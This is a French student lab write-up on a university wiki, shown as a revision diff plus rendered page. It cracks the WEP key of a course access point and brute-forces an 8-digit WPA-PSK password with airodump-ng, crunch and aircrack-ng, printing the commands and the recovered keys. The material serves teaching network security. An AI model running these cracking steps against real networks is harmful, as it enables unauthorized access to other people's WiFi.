« Atelier SysRes SE4 2025/2026 E10 » : différence entre les versions

De wiki-se.plil.fr
Aller à la navigation Aller à la recherche
Ligne 28 : Ligne 28 :


BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
</syntaxhighlight>L'adresse MAC de cracotte10 est donc
</syntaxhighlight>L'adresse '''MAC de cracotte10''' est donc


<code>04:DA:D2:9C:50:59</code>
<code>04:DA:D2:9C:50:59</code>
Ligne 38 : Ligne 38 :


==== Cassage de la clef WEP ====
==== Cassage de la clef WEP ====
Pendant que le fichier se remplit,
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.


<code>sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap</code>
<code>sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap</code>
Si le programme réussit, nous '''obtenons la clef !'''
<code>KEY FOUND!  [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]</code>


=== Cassage de mot de passe WPA-PSK par force brute ===
=== Cassage de mot de passe WPA-PSK par force brute ===
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.


==== Adresse MAC de kracotte10 ====
==== Adresse MAC de kracotte10 ====
<code>44:AD:D9:5F:87:09  -72        3        0    0  13   54e. WPA2 CCMP   PSK  kracotte10</code>
Nous obtenons l'adresse MAC grâce à:
 
<code>sudo airodump-ng wlx40a5efd2140c --essid kracotte10</code>
 
Nous obtenons :<syntaxhighlight>
BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC CIPHER  AUTH ESSID
 
44:AD:D9:5F:87:09  -67        4        0   0  13   54e. WPA2 CCMP   PSK  kracotte10             
 
BSSID              STATION            PWR  Rate    Lost    Frames  Notes  Probes
 
</syntaxhighlight>L'adresse '''MAC de kracotte10''' est donc
 
<code>44:AD:D9:5F:87:09</code>
 
==== Dictionnaire ====
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage <code>crunch</code> est l'outil parfait dans notre cas.
 
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :
 
<code>crunch 8 8 0123456789 -o 8numbers_dico.txt</code>
 
==== Handshake ====
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :
 
<code>sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump</code>
 
==== Cassage de la clef WPA-PSK ====
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:
 
<code>sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap</code>
 
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.<syntaxhighlight>
                              Aircrack-ng 1.7
 
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)
 
      Time left: 16 minutes, 4 seconds                          66.63%
 
                          KEY FOUND! [ 66680666 ]
 
 
      Master Key    : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E
                      CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65
 
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01
                      FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A
                      03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00
                      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 
      EAPOL HMAC    : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E
</syntaxhighlight>


== Sécurisation et accès WiFi par WPA2-EAP ==
== Sécurisation et accès WiFi par WPA2-EAP ==

Version du 10 février 2026 à 17:54

Machines virtuelles

Configuration réseau

DNS/DNSSEC

Serveur Apache

Fail2Ban

Effraction WiFi

Cassage de clef WEP d’un point d’accès WiFi

Adresse MAC de cracotte10

Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser airodump-ng. Pour ce faire, nous devons tout d'abord trouver le nom de la carte réseau. On peut trouver cela via ip link.

J'obtiens alors wlan0, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le wlx40a5efd2140c

Ensuite, on scanne grâce à:

sudo airodump-ng wlx40a5efd2140c --essid cracotte10

Nous obtenons :

BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              

BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

L'adresse MAC de cracotte10 est donc

04:DA:D2:9C:50:59

Récupération de données

Une fois l'adresse mac et le canal récupérés, nous pouvons récupérer un flux de données qui sera stocké dans un fichier .cap

sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump

Cassage de la clef WEP

Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.

sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap

Si le programme réussit, nous obtenons la clef !

KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]

Cassage de mot de passe WPA-PSK par force brute

Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.

Adresse MAC de kracotte10

Nous obtenons l'adresse MAC grâce à:

sudo airodump-ng wlx40a5efd2140c --essid kracotte10

Nous obtenons :

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

L'adresse MAC de kracotte10 est donc

44:AD:D9:5F:87:09

Dictionnaire

Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage crunch est l'outil parfait dans notre cas.

Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :

crunch 8 8 0123456789 -o 8numbers_dico.txt

Handshake

Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :

sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump

Cassage de la clef WPA-PSK

Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:

sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap

Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.

	                               Aircrack-ng 1.7

      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)

      Time left: 16 minutes, 4 seconds                          66.63%

                           KEY FOUND! [ 66680666 ]


      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65

      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E

Sécurisation et accès WiFi par WPA2-EAP